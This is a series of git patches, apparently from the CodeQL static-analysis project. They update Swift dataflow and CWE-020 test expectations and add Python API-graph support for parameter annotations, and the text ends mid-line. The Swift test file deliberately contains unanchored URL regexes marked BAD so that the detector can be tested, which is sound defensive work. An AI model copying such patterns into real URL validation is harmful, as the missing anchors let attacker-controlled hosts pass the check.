[PATCH 0711/1267] Swift: Label the now missing cases for CWE-020 and dataflow. --- .../library-tests/dataflow/dataflow/DataFlowInline.expected | 1 - swift/ql/test/library-tests/dataflow/dataflow/test.swift | 2 +- .../query-tests/Security/CWE-020/UnanchoredUrlRegex.swift | 6 +++--- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected index e988711c1de..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected @@ -1,3 +1,2 @@ testFailures -| test.swift:863:24:864:1 | // $ flow=873\n | Missing result: flow=873 | failures diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 515aa666201..a0c6c6aee88 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -860,7 +860,7 @@ func testVarargs3(_ v: Int, _ args: Int...) { sink(arg: args[1]) // $ flow=873 for arg in args { - sink(arg: arg) // $ flow=873 + sink(arg: arg) // $ MISSING: flow=873 } let myKeyPath = \[Int][1] diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index 94d211ea0ba..e7b6661d2f2 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -79,9 +79,9 @@ func tests(url: String, secure: Bool) throws { _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below - "^https?://good.com" // BAD (missing post-anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below [NOT DETECTED] + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below [NOT DETECTED] + "^https?://good.com" // BAD (missing post-anchor), referenced below [NOT DETECTED] ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } From 45858527e2e73a4a4131e94ebb393f4f8775082a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 10:15:16 +0000 Subject: [PATCH 0712/1267] Swift: Add another test case. --- .../Security/CWE-020/MissingRegexAnchor.expected | 5 +++-- .../query-tests/Security/CWE-020/UnanchoredUrlRegex.swift | 6 ++++++ 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index 38c675f7199..eb8c54fad76 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected @@ -46,8 +46,9 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:95:39:95:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:101:39:101:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:91:3:91:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:101:39:101:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:107:39:107:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | test.swift:56:16:56:16 | ^http://example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | test.swift:59:16:59:16 | ^http://test\\.example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | test.swift:69:16:69:16 | ^(.+\\.(?:example-a\|example-b)\\.com)/ | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index e7b6661d2f2..11da2ea6b1f 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -86,6 +86,12 @@ func tests(url: String, secure: Bool) throws { for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } } + + let trustedUrlRegexs2 = [ + "https?://good.com", // BAD (missing anchor), referenced below + ] + if let _ = try NSRegularExpression(pattern: trustedUrlRegexs2[0]).firstMatch(in: input, range: inputRange) { } + let notUsedUrlRegexs = [ "https?://good.com" // OK (not referenced) ] From d1915c707d17d52a424ed17d70d95bf17da31282 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 26 Nov 2024 11:11:21 +0000 Subject: [PATCH 0713/1267] Swift: Add a test revealing the issue in pure dataflow. --- .../dataflow/dataflow/DataFlow.expected | 50 ++++++++++++ .../dataflow/dataflow/LocalFlow.expected | 81 +++++++++++++++++++ .../dataflow/dataflow/test2.swift | 34 +++++++- 3 files changed, 164 insertions(+), 1 deletion(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index c45959e061e..6214054c9fe 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -135,6 +135,28 @@ edges | test2.swift:69:10:69:10 | key | test2.swift:70:19:70:19 | key | provenance | | | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | test2.swift:69:5:69:5 | $generator [Collection element, Tuple element at index 0] | provenance | | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:82:19:82:19 | a1 [Collection element] | provenance | | +| test2.swift:76:14:76:47 | [...] [Collection element] | test2.swift:84:20:84:20 | a1 [Collection element] | provenance | | +| test2.swift:76:30:76:46 | call to source(_:) | test2.swift:76:14:76:47 | [...] [Collection element] | provenance | | +| test2.swift:82:19:82:19 | a1 [Collection element] | test2.swift:82:19:82:24 | ...[...] | provenance | | +| test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | provenance | | +| test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | provenance | | +| test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | test2.swift:84:14:84:14 | v | provenance | | +| test2.swift:84:14:84:14 | v | test2.swift:86:19:86:19 | v | provenance | | +| test2.swift:84:20:84:20 | a1 [Collection element] | test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:99:19:99:19 | a2 [Collection element] | provenance | | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | test2.swift:101:20:101:20 | a2 [Collection element] | provenance | | +| test2.swift:93:13:93:29 | call to source(_:) | test2.swift:93:5:93:5 | [post] a2 [Collection element] | provenance | | +| test2.swift:99:19:99:19 | a2 [Collection element] | test2.swift:99:19:99:24 | ...[...] | provenance | | +| test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | provenance | | +| test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | provenance | | +| test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | test2.swift:101:14:101:14 | v | provenance | | +| test2.swift:101:14:101:14 | v | test2.swift:103:19:103:19 | v | provenance | | +| test2.swift:101:20:101:20 | a2 [Collection element] | test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | provenance | | +| test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:9:15:9:15 | t1 | provenance | | | test.swift:6:19:6:26 | call to source() | test.swift:10:15:10:15 | t2 | provenance | | @@ -884,6 +906,30 @@ nodes | test2.swift:69:25:69:25 | call to makeIterator() [Collection element, Tuple element at index 0] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 0] | | test2.swift:69:25:69:25 | d4 [Collection element, Tuple element at index 0] | semmle.label | d4 [Collection element, Tuple element at index 0] | | test2.swift:70:19:70:19 | key | semmle.label | key | +| test2.swift:76:14:76:47 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| test2.swift:76:30:76:46 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:82:19:82:19 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:82:19:82:24 | ...[...] | semmle.label | ...[...] | +| test2.swift:84:5:84:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | +| test2.swift:84:5:84:5 | call to next() [some:0, Tuple element at index 1] | semmle.label | call to next() [some:0, Tuple element at index 1] | +| test2.swift:84:9:84:15 | (...) [Tuple element at index 1] | semmle.label | (...) [Tuple element at index 1] | +| test2.swift:84:14:84:14 | v | semmle.label | v | +| test2.swift:84:20:84:20 | a1 [Collection element] | semmle.label | a1 [Collection element] | +| test2.swift:84:20:84:34 | call to enumerated() [Collection element, Tuple element at index 1] | semmle.label | call to enumerated() [Collection element, Tuple element at index 1] | +| test2.swift:84:20:84:34 | call to makeIterator() [Collection element, Tuple element at index 1] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 1] | +| test2.swift:86:19:86:19 | v | semmle.label | v | +| test2.swift:93:5:93:5 | [post] a2 [Collection element] | semmle.label | [post] a2 [Collection element] | +| test2.swift:93:13:93:29 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:99:19:99:19 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:99:19:99:24 | ...[...] | semmle.label | ...[...] | +| test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | +| test2.swift:101:5:101:5 | call to next() [some:0, Tuple element at index 1] | semmle.label | call to next() [some:0, Tuple element at index 1] | +| test2.swift:101:9:101:15 | (...) [Tuple element at index 1] | semmle.label | (...) [Tuple element at index 1] | +| test2.swift:101:14:101:14 | v | semmle.label | v | +| test2.swift:101:20:101:20 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:101:20:101:34 | call to enumerated() [Collection element, Tuple element at index 1] | semmle.label | call to enumerated() [Collection element, Tuple element at index 1] | +| test2.swift:101:20:101:34 | call to makeIterator() [Collection element, Tuple element at index 1] | semmle.label | call to makeIterator() [Collection element, Tuple element at index 1] | +| test2.swift:103:19:103:19 | v | semmle.label | v | | test.swift:6:19:6:26 | call to source() | semmle.label | call to source() | | test.swift:7:15:7:15 | t1 | semmle.label | t1 | | test.swift:9:15:9:15 | t1 | semmle.label | t1 | @@ -1615,6 +1661,10 @@ subpaths | test2.swift:53:15:53:28 | ... ??(_:_:) ... | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:53:15:53:28 | ... ??(_:_:) ... | result | | test2.swift:54:15:54:24 | ...! | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:54:15:54:24 | ...! | result | | test2.swift:70:19:70:19 | key | test2.swift:60:8:60:24 | call to source(_:) | test2.swift:70:19:70:19 | key | result | +| test2.swift:82:19:82:24 | ...[...] | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:82:19:82:24 | ...[...] | result | +| test2.swift:86:19:86:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:86:19:86:19 | v | result | +| test2.swift:99:19:99:24 | ...[...] | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:99:19:99:24 | ...[...] | result | +| test2.swift:103:19:103:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:103:19:103:19 | v | result | | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | result | | test.swift:9:15:9:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:9:15:9:15 | t1 | result | | test.swift:10:15:10:15 | t2 | test.swift:6:19:6:26 | call to source() | test.swift:10:15:10:15 | t2 | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index de168973ec8..7ec3f1a5aa4 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -161,6 +161,87 @@ | test2.swift:69:25:69:25 | $generator | test2.swift:69:25:69:25 | SSA def($generator) | | test2.swift:69:25:69:25 | SSA def($generator) | test2.swift:69:5:69:5 | $generator | | test2.swift:69:25:69:25 | call to makeIterator() | test2.swift:69:25:69:25 | $generator | +| test2.swift:76:9:76:9 | SSA def(a1) | test2.swift:78:14:78:14 | a1 | +| test2.swift:76:9:76:9 | a1 | test2.swift:76:9:76:9 | SSA def(a1) | +| test2.swift:76:14:76:47 | [...] | test2.swift:76:9:76:9 | a1 | +| test2.swift:78:5:78:5 | $v$generator | test2.swift:78:5:78:5 | &... | +| test2.swift:78:5:78:5 | &... | test2.swift:78:5:78:5 | $v$generator | +| test2.swift:78:5:78:5 | [post] $v$generator | test2.swift:78:5:78:5 | &... | +| test2.swift:78:9:78:9 | SSA def(v) | test2.swift:79:19:79:19 | v | +| test2.swift:78:9:78:9 | v | test2.swift:78:9:78:9 | SSA def(v) | +| test2.swift:78:14:78:14 | $v$generator | test2.swift:78:14:78:14 | SSA def($v$generator) | +| test2.swift:78:14:78:14 | SSA def($v$generator) | test2.swift:78:5:78:5 | $v$generator | +| test2.swift:78:14:78:14 | [post] a1 | test2.swift:81:21:81:21 | a1 | +| test2.swift:78:14:78:14 | a1 | test2.swift:81:21:81:21 | a1 | +| test2.swift:78:14:78:14 | call to makeIterator() | test2.swift:78:14:78:14 | $v$generator | +| test2.swift:81:5:81:5 | $ix$generator | test2.swift:81:5:81:5 | &... | +| test2.swift:81:5:81:5 | &... | test2.swift:81:5:81:5 | $ix$generator | +| test2.swift:81:5:81:5 | [post] $ix$generator | test2.swift:81:5:81:5 | &... | +| test2.swift:81:9:81:9 | SSA def(ix) | test2.swift:82:22:82:22 | ix | +| test2.swift:81:9:81:9 | ix | test2.swift:81:9:81:9 | SSA def(ix) | +| test2.swift:81:15:81:15 | $ix$generator | test2.swift:81:15:81:15 | SSA def($ix$generator) | +| test2.swift:81:15:81:15 | SSA def($ix$generator) | test2.swift:81:5:81:5 | $ix$generator | +| test2.swift:81:15:81:24 | call to makeIterator() | test2.swift:81:15:81:15 | $ix$generator | +| test2.swift:81:21:81:21 | [post] a1 | test2.swift:82:19:82:19 | a1 | +| test2.swift:81:21:81:21 | [post] a1 | test2.swift:84:20:84:20 | a1 | +| test2.swift:81:21:81:21 | a1 | test2.swift:82:19:82:19 | a1 | +| test2.swift:81:21:81:21 | a1 | test2.swift:84:20:84:20 | a1 | +| test2.swift:82:19:82:19 | &... | test2.swift:82:19:82:19 | a1 | +| test2.swift:82:19:82:19 | &... | test2.swift:84:20:84:20 | a1 | +| test2.swift:82:19:82:19 | [post] a1 | test2.swift:82:19:82:19 | &... | +| test2.swift:82:19:82:19 | a1 | test2.swift:82:19:82:19 | &... | +| test2.swift:84:5:84:5 | $generator | test2.swift:84:5:84:5 | &... | +| test2.swift:84:5:84:5 | &... | test2.swift:84:5:84:5 | $generator | +| test2.swift:84:5:84:5 | [post] $generator | test2.swift:84:5:84:5 | &... | +| test2.swift:84:10:84:10 | SSA def(ix) | test2.swift:85:19:85:19 | ix | +| test2.swift:84:10:84:10 | ix | test2.swift:84:10:84:10 | SSA def(ix) | +| test2.swift:84:14:84:14 | SSA def(v) | test2.swift:86:19:86:19 | v | +| test2.swift:84:14:84:14 | v | test2.swift:84:14:84:14 | SSA def(v) | +| test2.swift:84:20:84:20 | $generator | test2.swift:84:20:84:20 | SSA def($generator) | +| test2.swift:84:20:84:20 | SSA def($generator) | test2.swift:84:5:84:5 | $generator | +| test2.swift:84:20:84:34 | call to makeIterator() | test2.swift:84:20:84:20 | $generator | +| test2.swift:91:9:91:9 | SSA def(a2) | test2.swift:93:5:93:5 | a2 | +| test2.swift:91:9:91:9 | a2 | test2.swift:91:9:91:9 | SSA def(a2) | +| test2.swift:91:14:91:33 | [...] | test2.swift:91:9:91:9 | a2 | +| test2.swift:93:5:93:5 | &... | test2.swift:95:14:95:14 | a2 | +| test2.swift:93:5:93:5 | [post] a2 | test2.swift:93:5:93:5 | &... | +| test2.swift:93:5:93:5 | a2 | test2.swift:93:5:93:5 | &... | +| test2.swift:95:5:95:5 | $v$generator | test2.swift:95:5:95:5 | &... | +| test2.swift:95:5:95:5 | &... | test2.swift:95:5:95:5 | $v$generator | +| test2.swift:95:5:95:5 | [post] $v$generator | test2.swift:95:5:95:5 | &... | +| test2.swift:95:9:95:9 | SSA def(v) | test2.swift:96:19:96:19 | v | +| test2.swift:95:9:95:9 | v | test2.swift:95:9:95:9 | SSA def(v) | +| test2.swift:95:14:95:14 | $v$generator | test2.swift:95:14:95:14 | SSA def($v$generator) | +| test2.swift:95:14:95:14 | SSA def($v$generator) | test2.swift:95:5:95:5 | $v$generator | +| test2.swift:95:14:95:14 | [post] a2 | test2.swift:98:21:98:21 | a2 | +| test2.swift:95:14:95:14 | a2 | test2.swift:98:21:98:21 | a2 | +| test2.swift:95:14:95:14 | call to makeIterator() | test2.swift:95:14:95:14 | $v$generator | +| test2.swift:98:5:98:5 | $ix$generator | test2.swift:98:5:98:5 | &... | +| test2.swift:98:5:98:5 | &... | test2.swift:98:5:98:5 | $ix$generator | +| test2.swift:98:5:98:5 | [post] $ix$generator | test2.swift:98:5:98:5 | &... | +| test2.swift:98:9:98:9 | SSA def(ix) | test2.swift:99:22:99:22 | ix | +| test2.swift:98:9:98:9 | ix | test2.swift:98:9:98:9 | SSA def(ix) | +| test2.swift:98:15:98:15 | $ix$generator | test2.swift:98:15:98:15 | SSA def($ix$generator) | +| test2.swift:98:15:98:15 | SSA def($ix$generator) | test2.swift:98:5:98:5 | $ix$generator | +| test2.swift:98:15:98:24 | call to makeIterator() | test2.swift:98:15:98:15 | $ix$generator | +| test2.swift:98:21:98:21 | [post] a2 | test2.swift:99:19:99:19 | a2 | +| test2.swift:98:21:98:21 | [post] a2 | test2.swift:101:20:101:20 | a2 | +| test2.swift:98:21:98:21 | a2 | test2.swift:99:19:99:19 | a2 | +| test2.swift:98:21:98:21 | a2 | test2.swift:101:20:101:20 | a2 | +| test2.swift:99:19:99:19 | &... | test2.swift:99:19:99:19 | a2 | +| test2.swift:99:19:99:19 | &... | test2.swift:101:20:101:20 | a2 | +| test2.swift:99:19:99:19 | [post] a2 | test2.swift:99:19:99:19 | &... | +| test2.swift:99:19:99:19 | a2 | test2.swift:99:19:99:19 | &... | +| test2.swift:101:5:101:5 | $generator | test2.swift:101:5:101:5 | &... | +| test2.swift:101:5:101:5 | &... | test2.swift:101:5:101:5 | $generator | +| test2.swift:101:5:101:5 | [post] $generator | test2.swift:101:5:101:5 | &... | +| test2.swift:101:10:101:10 | SSA def(ix) | test2.swift:102:19:102:19 | ix | +| test2.swift:101:10:101:10 | ix | test2.swift:101:10:101:10 | SSA def(ix) | +| test2.swift:101:14:101:14 | SSA def(v) | test2.swift:103:19:103:19 | v | +| test2.swift:101:14:101:14 | v | test2.swift:101:14:101:14 | SSA def(v) | +| test2.swift:101:20:101:20 | $generator | test2.swift:101:20:101:20 | SSA def($generator) | +| test2.swift:101:20:101:20 | SSA def($generator) | test2.swift:101:5:101:5 | $generator | +| test2.swift:101:20:101:34 | call to makeIterator() | test2.swift:101:20:101:20 | $generator | | test.swift:5:9:5:13 | ... as ... | test.swift:5:9:5:9 | t2 | | test.swift:6:9:6:9 | SSA def(t1) | test.swift:7:15:7:15 | t1 | | test.swift:6:9:6:9 | t1 | test.swift:6:9:6:9 | SSA def(t1) | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift index cb8bdf16428..a1d9524a604 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift @@ -1,5 +1,5 @@ func source(_ label: String) -> String { return ""; } -func sink(arg: String) {} +func sink(arg: T) {} func testDicts() { let d1 = ["a": "apple", "b": "banana", "c": source("source1")] @@ -71,3 +71,35 @@ func testDicts4() { sink(arg: value) } } + +func testArrays1() { + var a1 = ["a", "b", "c", source("source5")] + + for v in a1 { + sink(arg: v) // $ MISSING: flow=source5 + } + for ix in 0 ..< a1.count { + sink(arg: a1[ix]) // $ flow=source5 + } + for (ix, v) in a1.enumerated() { + sink(arg: ix) + sink(arg: v) // $ flow=source5 + } +} + +func testArrays2() { + var a2 = ["a", "b", "c", "d"] + + a2[1] = source("source6") + + for v in a2 { + sink(arg: v) // $ MISSING: flow=source6 + } + for ix in 0 ..< a2.count { + sink(arg: a2[ix]) // $ flow=source6 + } + for (ix, v) in a2.enumerated() { + sink(arg: ix) + sink(arg: v) // $ flow=source6 + } +} From 2734377e5db9f52b9e3ce6c88a5ebeea4acfd1c2 Mon Sep 17 00:00:00 2001 From: Taus Date: Thu, 21 Nov 2024 16:11:11 +0000 Subject: [PATCH 0714/1267] Python: Add API graph support for parameter annotations Adds API graph support for observing that in ```python def foo(x : Bar): ... ``` The variable `x` is likely to be an instance of the type `Bar` inside this function. In particular, we add `getInstanceFromAnnotation` as a predicate on API graph nodes that tracks this step (corresponding to a new edge type labeled with "annotation" in the API graph), and extend the existing `getAnInstance` predicate to also include instances arising from type annotations. A more complete solution would also add support for annotated assignments (`x : Foo = ...` or just `x : Foo`) as well as track types through type aliases (`type Foo = Bar`). This turns out to be non-trivial, however, as these type constructs don't have any CFG nodes (and so no data-flow nodes by default either). In order to not have perfect be the enemy of good, this commit is only targeting the type parameter case (which is also likely to be the most common use case anyway). The tests for API graphs have been extended accordingly, including tests for the kinds of type ascriptions that we _don't_ currently model in API graphs (marked with `MISSING:` in the inline tests). --- ...-parameter-annotation-api-graph-support.md | 5 ++++ python/ql/lib/semmle/python/ApiGraphs.qll | 23 ++++++++++++++++- .../dataflow/new/internal/LocalSources.qll | 16 ++++++++++++ .../ApiGraphs/py3/test_annotations.py | 25 +++++++++++++++++++ 4 files changed, 68 insertions(+), 1 deletion(-) create mode 100644 python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md create mode 100644 python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py diff --git a/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md b/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md new file mode 100644 index 00000000000..57bb1b4a078 --- /dev/null +++ b/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md @@ -0,0 +1,5 @@ +--- +category: feature +--- + +- Added support for parameter annotations in API graphs. This means that in a function definition such as `def foo(x: Bar): ...`, you can now use the `getInstanceFromAnnotation()` method to step from `Bar` to `x`. In addition to this, the `getAnInstance` method now also includes instances arising from parameter annotations. diff --git a/python/ql/lib/semmle/python/ApiGraphs.qll b/python/ql/lib/semmle/python/ApiGraphs.qll index 4385259ca9b..b45c10e1417 100644 --- a/python/ql/lib/semmle/python/ApiGraphs.qll +++ b/python/ql/lib/semmle/python/ApiGraphs.qll @@ -195,6 +195,12 @@ module API { */ Node getReturn() { result = this.getASuccessor(Label::return()) } + /** + * Gets a node representing instances of the class represented by this node, as specified via + * type annotations. + */ + Node getInstanceFromAnnotation() { result = this.getASuccessor(Label::annotation()) } + /** * Gets a node representing the `i`th parameter of the function represented by this node. * @@ -229,7 +235,9 @@ module API { /** * Gets a node representing an instance of the class (or a transitive subclass of the class) represented by this node. */ - Node getAnInstance() { result = this.getASubclass*().getReturn() } + Node getAnInstance() { + result in [this.getASubclass*().getReturn(), this.getASubclass*().getInstanceFromAnnotation()] + } /** * Gets a node representing the result from awaiting this node. @@ -834,6 +842,10 @@ module API { lbl = Label::return() and ref = pred.getACall() or + // Getting an instance via a type annotation + lbl = Label::annotation() and + ref = pred.getAnAnnotatedInstance() + or // Awaiting a node that is a use of `base` lbl = Label::await() and ref = pred.getAnAwaited() @@ -1079,6 +1091,7 @@ module API { } or MkLabelSelfParameter() or MkLabelReturn() or + MkLabelAnnotation() or MkLabelSubclass() or MkLabelAwait() or MkLabelSubscript() or @@ -1148,6 +1161,11 @@ module API { override string toString() { result = "getReturn()" } } + /** A label for annotations. */ + class LabelAnnotation extends ApiLabel, MkLabelAnnotation { + override string toString() { result = "getAnnotatedInstance()" } + } + /** A label that gets the subclass of a class. */ class LabelSubclass extends ApiLabel, MkLabelSubclass { override string toString() { result = "getASubclass()" } @@ -1207,6 +1225,9 @@ module API { /** Gets the `return` edge label. */ LabelReturn return() { any() } + /** Gets the `annotation` edge label. */ + LabelAnnotation annotation() { any() } + /** Gets the `subclass` edge label. */ LabelSubclass subclass() { any() } diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll b/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll index 733795478ce..c43a111c9c8 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll @@ -119,6 +119,11 @@ class LocalSourceNode extends Node { */ CallCfgNode getACall() { Cached::call(this, result) } + /** + * Gets a node that has this node as its annotation. + */ + Node getAnAnnotatedInstance() { Cached::annotatedInstance(this, result) } + /** * Gets an awaited value from this node. */ @@ -275,6 +280,17 @@ private module Cached { ) } + cached + predicate annotatedInstance(LocalSourceNode node, Node instance) { + exists(ExprNode n | node.flowsTo(n) | + instance.asCfgNode().getNode() = + any(AnnAssign ann | ann.getAnnotation() = n.asExpr()).getTarget() + or + instance.asCfgNode().getNode() = + any(Parameter p | p.getAnnotation() = n.asCfgNode().getNode()) + ) + } + /** * Holds if `node` flows to a value that, when awaited, results in `awaited`. */ diff --git a/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py b/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py new file mode 100644 index 00000000000..664096b9d33 --- /dev/null +++ b/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py @@ -0,0 +1,25 @@ +from types import AssignmentAnnotation, ParameterAnnotation + +def test_annotated_assignment(): + local_x : AssignmentAnnotation = create_x() #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + local_x #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +global_x : AssignmentAnnotation #$ use=moduleImport("types").getMember("AssignmentAnnotation") +global_x #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +def test_parameter_annotation(parameter_y: ParameterAnnotation): #$ use=moduleImport("types").getMember("ParameterAnnotation") + parameter_y #$ use=moduleImport("types").getMember("ParameterAnnotation").getAnnotatedInstance() + +type Alias = AssignmentAnnotation + +global_z : Alias #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") +global_z #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +def test_parameter_alias(parameter_z: Alias): #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + parameter_z #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +# local type aliases +def test_local_type_alias(): + type LocalAlias = AssignmentAnnotation + local_alias : LocalAlias = create_value() #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + local_alias #$ MISSING: 